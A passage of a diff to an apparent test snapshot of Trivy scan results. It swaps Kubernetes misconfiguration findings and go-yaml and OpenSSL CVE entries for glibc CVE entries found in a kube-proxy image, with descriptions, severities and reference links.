'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-23219", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "https://access.redhat.com/security/cve/CVE-2022-23219", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "https://linux.oracle.com/cve/CVE-2022-23219.html", + "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "https://security.gentoo.org/glsa/202208-24", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2022-23219", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://access.redhat.com/security/cve/CVE-2022-23219", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://security.gentoo.org/glsa/202208-24", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kindnet-cni' of DaemonSet 'kindnet' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kindnet' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", @@ -98064,13724 +99898,11682 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1751", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", + "https://access.redhat.com/security/cve/CVE-2020-1751", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "https://linux.oracle.com/cve/CVE-2020-1751.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200430-0002/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1751", ], }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsNonRoot' to true)", + "category": "Vulnerability", + "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: array overflow in backtrace functions for powerpc", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://avd.aquasec.com/nvd/cve-2020-1751", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://access.redhat.com/security/cve/CVE-2020-1751", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kindnet-cni' of DaemonSet 'kindnet' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'kindnet-cni' of DaemonSet 'kindnet' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(DaemonSet 'kindnet' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kindnet' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-1752", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://access.redhat.com/security/cve/CVE-2020-1752", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "https://linux.oracle.com/cve/CVE-2020-1752.html", + "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "https://security.gentoo.org/glsa/202101-20", + "https://security.netapp.com/advisory/ntap-20200511-0005/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-1752", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: use-after-free in glob() function when expanding ~user", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2020-1752", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2020-1752", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libcrypto3", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", - ], - }, - "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libssl3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": 